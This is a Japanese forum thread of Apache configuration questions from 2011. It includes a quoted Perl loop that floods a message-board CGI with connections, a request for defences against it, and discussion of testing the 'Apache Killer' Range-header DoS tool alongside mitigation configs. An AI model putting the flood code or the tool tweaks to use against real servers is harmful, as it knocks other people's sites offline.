> ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか?
そんなことはない。注意事項がマニュアルに書いてある。
マニュアルも読まない奴はサーバー管理しちゃいけないというトラップ。
475 :名無しさん@お腹いっぱい。2011/06/02(木) 20:11:56.10
microformatsのrel-tagを使うためにはapahceで何か設定が必要ですか?
ググっても何も出てこないよ
477 :名無しさん@お腹いっぱい。2011/06/03(金) 23:19:38.09
HTMLでそう書けばいいだけの話なのでApacheは関係してこないと思うが。
479 :名無しさん@お腹いっぱい。2011/06/04(土) 21:06:20.75
>>477
HTMLで記述してもうまく動かないからサーバーの方に問題があるのかと思いまして・・・
480 :名無しさん@お腹いっぱい。2011/06/05(日) 00:33:34.28
>>479のおつむに問題があるのは確かだな
481 :名無しさん@お腹いっぱい。2011/06/06(月) 20:24:12.23
debianでapache2をインストール後間違ってapache2を削除してしまい、再度インストールしようとすると
「Sub-process /usr/bin/dpkg returned an error code」
と出てしまいます。
どうしたら再インストール出来るか教えてください。
487 :名無しさん@お腹いっぱい。2011/06/10(金) 06:07:56.31
>>481
その an error code がなんなのかわからないと答えようがないと思うが。
482 :名無しさん@お腹いっぱい。2011/06/06(月) 20:28:52.63
でびあんから再インストールすれば良いよ。
483 :名無しさん@お腹いっぱい。2011/06/06(月) 20:41:33.54
>>482
1から設定しなおすのが大変なので他にないでしょうか?
484 :名無しさん@お腹いっぱい。2011/06/06(月) 21:12:18.11
あるだろうけど、適切な場所で質問しなけりゃ解は得られないだろうね。
486 :名無しさん@お腹いっぱい。2011/06/08(水) 21:01:28.15
apacheとmod_wsgiでアプリケーションを動かしています。
ログイン情報などをsessionで保存しているのですが、これを一度クリアすることってできますか?
489 :名無しさん@お腹いっぱい。2011/06/16(木) 04:07:49.48
スレ違いかもしれませんがmod_Jkのフェイルオーバについて知っている方がいたら教えてください。
Webサーバ2台、APサーバ2台で構成しており、workers.propertiesは
以下のものがWebサーバ2台ともに入っています。

===
worker.list=wlb

worker.w1.type=ajp13
worker.w1.host=192.168.0.201
worker.w1.port=8009
worker.w1.redirect=w2

worker.w2.type=ajp13
worker.w2.host=192.168.0.202
worker.w2.port=8009
worker.w2.activation=disable

worker.wlb.type=lb
worker.wlb.balance_workers=w1,w2
worker.wlb.sticky_session=True
===

w1がダウンし続けた場合、mod_jkは定期的にw1にリクエストを送り、失敗したのちまたw2にフェイルオーバするという仕様になっているのでしょうか?
recovery_optionの設定も見たのですが、デフォルトが0ということでこの場合にどのような動作になるのかがわかりません。


環境は以下の通りです。
Fedora12
Apache2.2
mod_jk1.2.30

よろしくお願いいたします。
490 :名無しさん@お腹いっぱい。2011/06/22(水) 22:02:32.13
mod_rpaf がダウンロードできなくなってるんだけど、
http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz
誰かミラー知ってる人いませんか?
491 :名無しさん@お腹いっぱい。2011/06/24(金) 18:13:00.70
見つからないね。
違ってると思うけど、mod_extract_forwarded ではダメ?・・・だよね
494 :名無しさん@お腹いっぱい。2011/06/25(土) 10:49:30.95
検索してたら ports の Makefile が引っかかったから、
どっかにあると思ってたけど 492 さんには本当に感謝。
自分も昨日から急遽 source が必要になったから焦ってた。
495 :名無しさん@お腹いっぱい。2011/07/04(月) 18:37:48.03
mod_rewriteの設定数に上限はありますでしょうか
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-d
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f
RewriteRule ^/item/(.*)\.html /item/detail.php?id=$1 [P,QSA,NE,L]

このような設定がサイトごとに3つあり、10サイト稼働しています
サイトを増やしたところ$1が空でした
ログを見ると条件にマッチしてましたが、$1が空になってしまうのです
他のサイトを一時的に消したところ、なぜか期待通りの動きになりました
apacheのバージョンは2.2.9です
何かお分かりになりますでしょうか
497 :名無しさん@お腹いっぱい。2011/07/09(土) 01:11:49.14
Apache2.2を使って、ホワイトリスト型のフォワードプロキシ
(事前に指定したサイトしかアクセスできないように設定)
を作ろうとしているのですが、設定が上手くいかないです。

下記、例としてyahooおよびgoogleのみアクセスを許可して、
それ以外のサイトをアクセス拒否させる目的で設定しましたが、
一番上のアクセス拒否の設定が優先されてしまうため、
全てのサイトへのアクセスが拒否されてしまいます。

●現在の設定例(一部抜粋)
<Proxy *>
Order deny,allow
Deny from all
</Proxy>

<Proxy http://www.yahoo.co.jp/*>;
Order allow,deny
Allow from all
</Proxy>

<Proxy http://www.google.co.jp/*>;
Order allow,deny
Allow from all
</Proxy>

上記、あて先がyahooとgoogleのみアクセス許可して、
それ以外のサイトへのアクセスを拒否したいのですが、
Apache2.2でそれを行う方法はあるのでしょうか?
(configの記載順による優先順位の問題でしょうか?)

上記、わかる方がいれば、教えていただけると助かります。
よろしくお願いいたします。
498 :名無しさん@お腹いっぱい。2011/07/23(土) 18:08:53.11
ApacheのMPM改造したいんだけど。具体的には、バーチャルホストごとに帯域制御をしたい
参考になるサイトとかって無いかな。もしくは、やったことある人いる?
502 :名無しさん@お腹いっぱい。2011/07/24(日) 12:44:00.71
ソースコード見る限り、mod_evasiveとかmod_dosdetectorとかだと弱いんだよ。
相手からのリクエストを読んでから、遮断するから。

相手が接続だけして、何もデータを送ってこないと接続数がふくれあがるはず。実験してないけど
しかも、遮断する前にスレッドなりプロセスなりを割り当てるから、リソースが無駄。

本来は、acceptした時点でIPアドレスがわかるわけだから、それを振り分ける前に遮断するべき
505 :名無しさん@お腹いっぱい。2011/07/24(日) 14:18:19.69
510 :名無しさん@お腹いっぱい。2011/07/25(月) 01:21:57.68
>>509
バグ報告すれば?それかソースコード自分で見れば?
モジュール単体なら、そんなに量多くないから分かるはず

>>505
http://d.hatena.ne.jp/dayflower/20081029/1225266220
ここを参考mpmのソース見ると、ヘッダーを読み込んだあとにしかモジュールのフックをかけられない構造になってる。
だから、mpm改造しちゃえばできるんだけど。モジュール化の意味合いが薄まるから汚いかなって
511 :名無しさん@お腹いっぱい。2011/07/25(月) 01:24:03.92
>>505
不完全なのは知ってのことなのか。世界の誰か頑張れよ
俺がもっといいmpm作ろうかな。性能がよければ有名になれるかなwww
513 :名無しさん@お腹いっぱい。2011/07/25(月) 03:15:04.58
>>511
だったら作って有名になってみればいいじゃんw
506 :名無しさん@お腹いっぱい。2011/07/24(日) 18:05:28.86
なんか無知な学生がレポート書きの手伝いを求めてるようなふいんきだな
507 :名無しさん@お腹いっぱい。2011/07/24(日) 20:34:50.64
>>506
そんな感じですね。

ぼんやりしたやり取りがたまらないw
509 :名無しさん@お腹いっぱい。2011/07/25(月) 00:22:08.76
たまに刺さってmod_cbandが発狂するので、一時間に一回再起動させて運用してるよ。。
なんか帯域カウンターが戻らなくて溜まってしまう感じ
512 :名無しさん@お腹いっぱい。2011/07/25(月) 02:28:49.74
分離してうまく作れるんじゃないかとあれこれ試行錯誤するが
結局のところモジュール本体に改造を入れることって多いよね。。。
514 :5092011/07/25(月) 10:37:52.60
ソースは追いかけて何処の変数がインクリメントしっぱなしかは確認したけど
複数プロセスで共有してる奴で、どっかで突然死するプロセスが居ればさもありなんて感じ
発生頻度も週一くらいで、何台かで回してるサービスだし面倒
515 :名無しさん@お腹いっぱい。2011/07/25(月) 11:56:14.21
2.4 に mod_ratelimit ってのが入るので、先取りしてバージョン上げちゃえ。
517 :名無しさん@お腹いっぱい。2011/08/04(木) 07:39:45.57
こんな感じなんだけどどうやったら対策できる?
攻撃元のスクリプトは以下

433 名無しさん@お腹いっぱい。 sage 2011/08/03(水) 14:51:01.84 ID:81.94.203.180 0
スクリプト自体はマルチスレッドでBBS.CGIを叩くだけなんだよな
こんな感じで

my $ref = sub{
while(){
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname( 'tcp'));
connect(SOCK, sockaddr_in("80", $ipaddr));
select(SOCK);
$|=1;
select(STDOUT);

print SOCK "POST /test/bbs.cgi HTTP/1.1\r\n";
print SOCK "Accept: */*\r\n";
print SOCK "Referer: http://$sv" . "/news/\r\n";
print SOCK "Accept-Language: ja,en;q=0.5\r\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\r\n";
print SOCK "Accept-Encoding: gzip, deflate\r\n";
print SOCK "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\r\n";
print SOCK "Host: $sv\r\n";
print SOCK "Content-Length: 1\r\n";
print SOCK "Connection: Keep-Alive\r\n";
print SOCK "\r\n";
close(SOCK);

threads->yield();
}
};
518 :名無しさん@お腹いっぱい。2011/08/04(木) 10:17:16.26
slowloris 対策なら RequestReadTimeout で。
519 :名無しさん@お腹いっぱい。2011/08/04(木) 10:38:02.85
>>518
ありがとう
520 :名無しさん@お腹いっぱい。2011/08/07(日) 14:40:43.49
ブラウザでリクエストヘッダーに
Keep-Aliveの時間を指定した場合、どういう時間を指し示すのでしょうか?
Wikipediaを見ていてふと疑問に思いました。

Keepalive time is the duration between two keepalive transmissions in idle condition. TCP keepalive period is required to be configurable and by default is set to no less than 2 hours.
Keepalive interval is the duration between two successive keepalive retransmissions, if acknowledgement to the previous keepalive transmission is not received.

http://en.wikipedia.org/wiki/Keepalive
523 :名無しさん@お腹いっぱい。2011/08/09(火) 04:00:06.70
wgetで直アクセスすると404 Not Foundを返して来て、
telnetでアクセス(HEAD /some/foo/hoge.jpg HTTP/1.0)しても404を返してくるサーバがあります。
それなのに、chromeでアクセスすると画像が表示されます。

これってどういう設定なのでしょうか?
telnetやwgetでchromeと同じ結果を得るためには、どうアクセスするべきなのでしょうか?
525 :名無しさん@お腹いっぱい。2011/08/10(水) 03:24:02.30
Referer の制限かなあ。
Chrome で見えるって言うのは、画像の URI を直接指定して?
こちらの紳士達が詳しいかも↓
http://hibari.2ch.net/test/read.cgi/unix/1305422004/l50
526 :名無しさん@お腹いっぱい。2011/08/10(水) 22:09:42.74
ホスト名やリファラによる制限はブラウザと関係ないし
ユーザエージェント制限の可能性があるけどその場合は404じゃんくて403だよね
527 :名無しさん@お腹いっぱい。2011/08/10(水) 23:46:51.84
何を返してくるかは相手次第だろうに403と決めてかかるとかw
528 :名無しさん@お腹いっぱい。2011/08/11(木) 00:04:53.56
403を404エラーとして返すサーバならそうだろうけど、わざわざそうする理由があるサーバということだよね?
530 :名無しさん@お腹いっぱい。2011/08/11(木) 12:15:38.68
>>528
軽い気持ちで404返してるかも知れないのにお前は何を言ってるんだ?
533 :名無しさん@お腹いっぱい。2011/08/18(木) 10:42:17.44
違うドメイン名へのアクセスをエラーにしたいんだけど
どう設定したらいいかな。

chinkoサーバに http://unko/ というアクセスがあったとき
200でなく404とか適切なエラーを返したい
536 :名無しさん@お腹いっぱい。2011/08/25(木) 21:34:02.90
CVE-2011-3192
Range header DoS vulnerability Apache HTTPD 1.3/2.x


1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

対策してね。
541 :名無しさん@お腹いっぱい。2011/08/26(金) 21:29:06.82
>>536
それ対策なってねーぞw
543 :名無しさん@お腹いっぱい。2011/08/26(金) 23:00:52.14
545 :名無しさん@お腹いっぱい。2011/08/27(土) 09:17:11.02
>>543
あんまし困らないけどenv=bad-req-rangeの定義がないような気がする・・・。
SetEnvIf漏れ?
537 :名無しさん@お腹いっぱい。2011/08/25(木) 22:01:49.96
【ニュー速ハッカー部】Apacheの脆弱性を突く「Apache Killer」 お前らのサーバの危険が危ない
http://hatsukari.2ch.net/test/read.cgi/news/1314272986/
538 :名無しさん@お腹いっぱい。2011/08/25(木) 23:31:09.77
赤帽パッチまだー( ゚д゚)
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192
570 :名無しさん@お腹いっぱい。2011/08/31(水) 23:31:26.50
赤帽バッチまだー
>>538
572 :名無しさん@お腹いっぱい。2011/09/01(木) 10:45:44.80
539 :名無しさん@お腹いっぱい。2011/08/26(金) 10:04:21.25
お前らどころか2chが盛大に落とされたわけだが、他のサイトでは対策してあんのかな
540 :名無しさん@お腹いっぱい。2011/08/26(金) 11:57:53.46
2chが盛大に落ちたんだから他の奴等はこれはヤバいwと気づいて対策するだろうよ。
問題は2chが落ちた原因が ApacheKillerだと認識されてるかどうかだが。

2ch来てない奴には通用しないかも。ニュース系サイトでの取扱い鈍いし。
544 :名無しさん@お腹いっぱい。2011/08/26(金) 23:50:02.78
WAは検証して使えなかったから、ソース待ち
お前らちゃんと検証しろよな
547 :名無しさん@お腹いっぱい。2011/08/29(月) 18:31:37.90
LoadModuleにある、mod_authxxxxxっていっぱいあるけど、
「使ってないぞコレ」と思ったらコメントアウトしてOK?

なんか気を付けることがあったらおしえてください。
549 :名無しさん@お腹いっぱい。2011/08/29(月) 19:00:03.08
>548
一応Apacheのところを読んではいるんですが、
「××する機能」とはあるんですが、止めたら何が問題か?は書いてないですよね?

ノウハウっぽいところがあるのかな?と。
552 :名無しさん@お腹いっぱい。2011/08/29(月) 19:46:34.21
モジュールのページを見ると
そのモジュールが提供するディレクティブ一覧が載ってる。
そのディレクティブを使ってなければたいていいらない。
553 :名無しさん@お腹いっぱい。2011/08/29(月) 21:15:45.17
>550-552
大体そんな方針で良いみたいですね

ある程度最初からonにしてあるのは利便性のタメかな?
554 :名無しさん@お腹いっぱい。2011/08/29(月) 23:02:41.02
ある程度というより、configure時にsharedで有効にしたものは全部onになってるぞ
555 :名無しさん@お腹いっぱい。2011/08/30(火) 11:10:26.12
apacheを使い始めたばかりの者ですが、よく分からないことがあります。

apacheのドキュメントルート直下に/cgi-bin/という名前のフォルダを作ると、
Forbiddenとなってしまい、それ以下のファイルを参照することが出来なくなってしまいます。
直下に/cgi-bin/を配置するのではなく、/test/cgi-bin/というようにワンクッション置けば参照できるようになります。
これは正常な動作なのでしょうか?
また、これが正常な動作である場合、ドキュメントルート直下に/cgi-bin/というフォルダを置いても
Forbiddenにならないようにするにはどのように設定を変更すればよいのでしょうか?

教えていただきたいです。
556 :名無しさん@お腹いっぱい。2011/08/30(火) 11:20:54.28
>>555
っ ScriptAlias
557 :5552011/08/30(火) 12:28:42.47
>>556
ありがとうございます。
つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
それでScriptAliasの設定が優先されるので、自分で作成した/cgi-bin/はForbiddenになってしまうと。

あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
cgi自体をダウンロードされたり表示されないようにするためだと記してあるサイトが多いようですが、
ScriptAliasに置かなくてもcgiにアクセスしたら、結局はプログラムが実行された後の結果しか与えられないと考えていたのですが。
ScriptAliasで設定したディレクトリ以外に置かれたcgiというのは、その中身が簡単にみられてしまったりするのでしょうか?
558 :名無しさん@お腹いっぱい。2011/08/30(火) 13:28:23.86
>>557
> つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
ScriptAlias の指定が優先されてドキュメントルートの方の /cgi-bin/ は参照されない。

> あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
一ヶ所に集めておくと管理しやすい。
あやしいプログラムをユーザに勝手に置かれるのを防ぐ。
559 :5552011/08/30(火) 14:09:15.85
>>558
解説ありがとうございます。

>あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

これはつまりセキュリティの事を考慮すると、cgiはScriptAliasで設定したディレクトリに置いた方がよいということですよね。

この質問とは別のことになりますが、例えばページの管理者だけが使用することを目的としたcgiを作成した場合、
ドキュメントルート下にhtaccessの設定でBasic認証を有効にしたディレクトリにそのcgiを置くよりも、
ScriptAliasで設定したディレクトリにそのcgiを置いた方がセキュリティ面では良いということになるのでしょうか?
560 :名無しさん@お腹いっぱい。2011/08/30(火) 14:21:51.67
>>559
管理しきれるならどこに置いてもいいんじゃね。

あと、自分と同じディレクトリにデータファイルを作るようなプログラムがあった場合に
ScriptAlias 以下ならそのファイルを覗かれることがない、っていう利点もあるにはある。
副次的な効果だけど。
そんなプログラム作る方が悪いんだけど。
561 :5552011/08/30(火) 14:34:43.13
>>560

とりあえず、初心者なのでScriptAliasで設定したディレクトリにcgiを集めることにしてみます。

お答えくださってありがとうございました。
565 :名無しさん@お腹いっぱい。2011/08/31(水) 14:52:22.61
1.3系使ってる人はどうするの?
まだまだ沢山いると思うんだけど...
567 :名無しさん@お腹いっぱい。2011/08/31(水) 15:06:53.44
自分のサーバーなら2.2系使ってるんだけどね...
仕事先のだとなかなか...
573 :名無しさん@お腹いっぱい。2011/09/01(木) 11:18:40.39
2.0系のパッチの予定はないのかな?
575 :名無しさん@お腹いっぱい。2011/09/01(木) 12:11:51.87
>>573
RHEL4.xのパッチをパクればOK
579 :名無しさん@お腹いっぱい。2011/09/01(木) 13:15:49.58
>>574>>575
非公式な対応はいろいろあるけど、
公式に出ないのかな、と思って。
574 :名無しさん@お腹いっぱい。2011/09/01(木) 11:40:51.42
自分でバックポートしれ そして配布しれ
577 :名無しさん@お腹いっぱい。2011/09/01(木) 12:39:32.05
早い対応、めでたし。
今回の脆弱性で実際に攻撃を受けたってサイトはあるの?
578 :名無しさん@お腹いっぱい。2011/09/01(木) 13:12:44.86
>>577
2ch とか?
580 :名無しさん@お腹いっぱい。2011/09/01(木) 14:41:38.01
581 :名無しさん@お腹いっぱい。2011/09/01(木) 14:43:16.08
>>580
とつぜんどうしたの。
583 :名無しさん@お腹いっぱい。2011/09/01(木) 18:50:37.25
Apache Killerの件で
落としてみて報告してくれと無茶ぶりされて、
必死こいて頑張っていますが、
killapache.pl を使って、
1.3.xでは落ちません。
2.2.xでは落ちました。
変な話ですが、1.3.xで落とせた方はいらっしゃいますか?
589 :名無しさん@お腹いっぱい。2011/09/01(木) 22:15:07.02
585 :名無しさん@お腹いっぱい。2011/09/01(木) 20:26:28.53
1.3はinetdモード使えるから今でも重宝してる
586 :名無しさん@お腹いっぱい。2011/09/01(木) 20:35:48.51
>>585
なんでinetdモード使ってるの?
588 :名無しさん@お腹いっぱい。2011/09/01(木) 21:50:55.78
>>586
TCP Wrapper が使いたいとか?
587 :名無しさん@お腹いっぱい。2011/09/01(木) 20:38:22.72
ちゃんとプロセス数増やしてメモリ潰さないと止まらないっしょ
590 :名無しさん@お腹いっぱい。2011/09/01(木) 22:40:19.55
583です。
MaxClientsを下げて10にしましたが、ビクともしません。
そもそもkillapache.plの
28行目 for ($k=0;$k<1300;$k++) {

for ($k=5;$k<1300;$k++) {
としないと
206 Partial Content
が返りませんでした。200が返りました。
2.2.xでは、何もしなくても206が返りました。
再現方法が違うのでしょうか?
591 :名無しさん@お腹いっぱい。2011/09/01(木) 22:45:57.52
592 :名無しさん@お腹いっぱい。2011/09/01(木) 23:09:15.40
>>591
583です。

そんな今さら・・・

Apache 1.3 is NOT vulnerable.
えっ!?

UPDATE2までしか見ていませんでした。
ありがとうございました!
596 :名無しさん@お腹いっぱい。2011/09/03(土) 12:23:58.91
http://huge.shit.com/test.php -> 200 OK
http://huge.shit.com/test.php?param=xxx -> 404 Not Found
http://<;上記ドメインのIP>/test.php -> 200 OK
http://<;上記ドメインのIP>/test.php?param=xxx -> 200 OK

Virtualhostへのアクセスで存在するファイルにGETパラメータを渡すと404になる。
こんな現象に悩まされてるんだけど、これなんで?誰か教えて!
602 :名無しさん@お腹いっぱい。2011/09/03(土) 14:21:53.08
>>596

Rewrite使ってる?
Apache Killerの件で設定変えたとか。
603 :名無しさん@お腹いっぱい。2011/09/03(土) 15:36:13.73
>>602
Rewriteは、してないね。
killapache対策はしたけど、数日前なので、タイミングは合致しないなー。
622 :名無しさん@お腹いっぱい。2011/09/06(火) 21:36:14.32
連投ですまん。
あと、>>596 を見て思うのは、
huge.shit.com/test.php?param=xxx のときは
"test.php?param=xxx" というファイルを探しに行ってるんじゃないかと・・・

まぁ、バーチャルホスト内の設定のどこかがおかしいんだろう。
あとは .htaccess が置いてあったりとか。
624 :名無しさん@お腹いっぱい。2011/09/07(水) 11:43:32.18
>>622

?が全角
626 :名無しさん@お腹いっぱい。2011/09/12(月) 16:53:37.17
>>596
その後どうよ。
598 :名無しさん@お腹いっぱい。2011/09/03(土) 12:45:11.61
ログは File is not found が並んでるだけなんだよね。
ていうか、パラメータ渡すと not found になる設定ってあるのかな。
昨日まで正常だったのに、いきなりこの現象が発生してわけわからんのです。
621 :名無しさん@お腹いっぱい。2011/09/06(火) 21:31:32.29
>>598
LogLevel debug を設定したらヒントが出るかもしれない。
600 :名無しさん@お腹いっぱい。2011/09/03(土) 13:48:55.99
restartはしたんすよ。変わらずです。
おれ以外にも管理者はいるから誰かが
何かを書き換えた可能性はなくはないんだよね。
?でパラメータ渡すと別ファイルとして認識されちゃうってことだよね多分これ。
601 :名無しさん@お腹いっぱい。2011/09/03(土) 14:14:14.82
書き換えた人に聞いた方が早くない?
confの日付で実際更新されてるか分かるだろうし。
605 :名無しさん@お腹いっぱい。2011/09/03(土) 16:34:37.48
普通設定いじる前にバックアップとらない?
diffすればいいんじゃない?
606 :名無しさん@お腹いっぱい。2011/09/03(土) 16:57:16.34
>> 601
誰が何を変更したのかがわかる状況ではないんだよね。confの更新日はkillapache対策の時だね。昨日じゃない。
ためしにRange周りの設定をオフってみたけど関係ないみたい。
>> 604
FirefoxのHackbarってアドオン使ってPOSTしてみた限りでは問題なかべおん。
てかさ、
/js/jquery.js
だとアクセスできて
/js/jqueyr.js?test
でNot Foundになるってどおゆうことなんだろう。んなことある?
607 :名無しさん@お腹いっぱい。2011/09/03(土) 18:53:08.15
>>606

違うブラウザではどんな?同じ動作?
608 :名無しさん@お腹いっぱい。2011/09/03(土) 19:19:20.79
>>606
うだうだ書いてるヒマあったら他の管理者どもに話を訊けよアホ
あと設定ファイルの変更履歴とれやボケ
611 :名無しさん@お腹いっぱい。2011/09/03(土) 22:37:24.77
>>607
どのブラウザでも一緒だね。
IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
>>608
confに変更はない。他の管理者は連絡とれず。やーここの人なら「そりゃおめー原因はあれだよ」ってなるかなと
思ってさ。自力で調べつつ、わらにもすがる思いで聞いとります。
612 :名無しさん@お腹いっぱい。2011/09/03(土) 23:28:57.17
>>611
config晒せば。

何らかの意図があって設定を変更しているのなら
設定を戻せば良いって話でもない気がするけど。
613 :名無しさん@お腹いっぱい。2011/09/03(土) 23:43:40.87
>>611

>IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
そこじゃないかもしれんぞな。

/js/jqueyr.js?test
↑↑↑↑
尻尾つきで、POSTするとどない?エラー?

614 :名無しさん@お腹いっぱい。2011/09/04(日) 00:07:46.90
>>613
こんな結果です。
[尻尾あり]
http://xxx.example.com/js/jquery.js?test
POST /js/jquery.js?test HTTP/1.1
HTTP/1.1 404 Not Found
[尻尾なし]
http://xxx.example.com/js/jquery.js
POST /js/jquery.js HTTP/1.1
HTTP/1.1 200 OK
615 :名無しさん@お腹いっぱい。2011/09/04(日) 00:42:20.85
>>614

POSTとGET関係ないと。

VirtualHostとの時だけ変なら、
試しに、違うドメインを追加(VirtualHost)して、そっちでも変になりますか?

差し障り範囲(ドメインとか、IPとかXXXして)で、confを見せていただけると、何か分かるかもね。
apacheバージョンとか、組み込んでるモジュールとか


616 :名無しさん@お腹いっぱい。2011/09/06(火) 07:41:07.60
遅ればせながらapache killer対策に取りかかっています
巨大なファイルを扱っていない限りrangeヘッダに非対応でもいいので

RequestHeader unset Range
RequestHeader unset Request-Range

二行追加でよろしいでしょうか?
617 :名無しさん@お腹いっぱい。2011/09/06(火) 08:16:43.48
バージョンチェックも入れました

<IfVersion < 2.2.20>
RequestHeader unset Range

RequestHeader unset Request-Range
</IfVersion>
618 :名無しさん@お腹いっぱい。2011/09/06(火) 14:25:04.79
話の流れに割り込むような形になってしまい申し訳ありませんが、Apache初心者の質問をさせてください。

Apacheにおける環境変数QUERY_STRINGの呼び出しに関する質問です。

Apache上に置いてあるshtml内にGETメソッドのフォームを設置しています。
フォームのテキストボックス内に日本語で文字を入力してsubmitボタンを押し、
新しく表示されたshtml内でSSIを使用して、cgiで環境変数QUERY_STRINGをshtml内に表示しようとしています。

テキストボックスに何も入力しない場合や半角英数字のみを入力した場合は正しく習得され、
cgiによってshtml内に環境変数QUERY_STRINGのデータがしっかりと表示されるのですが、
テキストボックス内に日本語を入力した場合は、shtml内に環境変数QUERY_STRINGの中身が
何もない状態であるかのように表示されてしまいます。つまり、『?』以降が何も表示されないということです。
しかし、テキストボックス内に日本語を入力した場合でも、新しく表示されたshtmlのURLには入力した文字データが
GETメソッドとして正常に受け取られているように表示されています。

AN HTTPDで全く同じshtmlおよびcgiを使用した場合は、日本語を入力してもshtml内にその結果が正しく表示されるので、
Apache内の何かが原因であるのではないかなと考えているのですが、よく分かりません。

お分かりになる方おられましたら、どうかよろしくお願いします。
620 :名無しさん@お腹いっぱい。2011/09/06(火) 18:18:46.32
それはわかっておりますw

shtmlがUTF-8じゃないんだろw
623 :6182011/09/07(水) 01:01:45.37
>>620

おっしゃるとおり、shtmlはUTF-8ではなくShift_JISで作成したものです。
UTF-8のページにしたところ、日本語のデータを表示することができました。
ありがとうございました。

GETを受けるページがUTF-8でなければならないのは、Apacheの仕様なのですか?
Shift_JISでも表示できるように、設定で変更することなどは可能ですか?
AN HTTPDではshtmlがShift-JISで書かれていてもちゃんと表示されていたので、
Apacheだとなぜ表示されないのかよく分からないのですが・・・。
629 :名無しさん@お腹いっぱい。2011/09/20(火) 12:59:10.14
こんにちは。質問させてください。

お名前.comでドメイン取得
さくらvpsを契約し

var/www/html/rails_app/public
をドキュメントとして
http://example.com にアクセスしたとき
Railsのアプリが走るようにしています

そして
usr/share/phpMyAdmin
にphpmyadminを入れています

http://phpmyadmin.example.com
にアクセスしたときだけ
phpmyadminが表示されるようにするには
どのような設定をすればいいでしょうか?
631 :名無しさん@お腹いっぱい。2011/09/23(金) 16:36:44.12
ソースからRPMを作ろうとしています
ソース同梱のspecファイル中に
# symlinks for /etc/httpd
とあって、logやrunやmodulesのシンボリックリンクを作ってるんですが
/etc/httpd配下にそんなシンボリックリンクいらなくないですか?
どういう意味があるんでしょうか
632 :名無しさん@お腹いっぱい。2011/09/23(金) 18:05:23.72
>>631
いらないと思うなら作る必要はない。
歴史的に /etc 配下に設定ファイルを集めているだけ
/etc の配下に httpd があれば、設定ファイルを探しやすいってだけだ

/usr/local/httpd とかに全部入れる人だっているんだし
自分だけが触るなら別に何でも良いじゃないの?

他人が触るなら /etc/httpd があった方が、親切
633 :名無しさん@お腹いっぱい。2011/09/26(月) 10:23:38.12
redhat 系では ServerRoot が /etc/httpd になっているので、
symlink がないとモジュールの場所はじめありとあらゆるものが
相対パスで書けなくなるんだよ。
634 :名無しさん@お腹いっぱい。2011/09/26(月) 17:31:11.27
そういう気遣いもドキュメントとか無いサーバいじるときは
$ ps -ef|egrep 'http|apache'
$ /usr/sbin/apache2 -V

って感じでたどっていくね><
636 :名無しさん@お腹いっぱい。2011/09/29(木) 21:04:06.24
httpd.confでアクセス制限をやろうとしています。
「localhost:8080」からのみアクセス許可したいのですができません。

Order allow,deny
Allow from localhost:8080

とやるとエラーが出てApacheが起動しなくなります。
どなたかご教授を・・。
654 :名無しさん@お腹いっぱい。2011/09/30(金) 02:33:04.31
>>636
8080はdst portだろ。
640 :6362011/09/29(木) 21:56:31.63
該当しそうな箇所を読んだけど載ってませんでした。
ポートを指定した場合のケースはググっても見つからないのよ。。
641 :名無しさん@お腹いっぱい。2011/09/29(木) 22:39:15.28
>>640
そのポートで Listen してるんよね。
そしたら、localhost だけAllow にして...
後は、分かるよな。
642 :名無しさん@お腹いっぱい。2011/09/29(木) 22:46:21.35
>>641
それだと403エラーとなってしまいます。

Forbidden

You don't have permission to access / on this server.

<Directory "C:/xampp/Apache/htdocs">
Allow from All
</Directory>

にしたり、Listenを80にすれば普通にアクセスできるのですが。
645 :6362011/09/29(木) 23:32:43.56
>>642
>Listenを80にすれば普通にアクセスできる
これは間違いでした。以下の設定で「http://localhost/」にアクセスしても
403エラーとなります。

Listen 80
ServerName localhost:80
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>

Allow from localhostの部分をAllow from Allとすると「It works!」と出て接続できます。
ポート関係なしにlocalhostからのみアクセス許可することもできません。
646 :名無しさん@お腹いっぱい。2011/09/29(木) 23:42:45.12
>>645

ちょっと、落ち着け。

403になるなら、
DocumentRoot はどこかね。

647 :名無しさん@お腹いっぱい。2011/09/29(木) 23:55:10.08
>>646
済みません、やはり最初ので正しいです。
>>645キャッシュが原因で403エラーとなっていたようで、クイック起動バーから
新しいウィンドウを開くと「It works!」と出て接続できます。
Allow from localhostで「http://localhost/」はOKということです。

ポートを8080にして「http://localhost:8080/」でアクセスすると403エラーとなります。
全ブラウザを閉じてからアクセスして確認しました。

Listen 8080
ServerName localhost:8080
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>

DocumentRoot "C:/xampp/Apache/htdocs"
648 :名無しさん@お腹いっぱい。2011/09/30(金) 00:10:00.39
>>647
8080 でアクセスするとき、error_log に何て出てる?
649 :名無しさん@お腹いっぱい。2011/09/30(金) 00:31:32.37
>>648

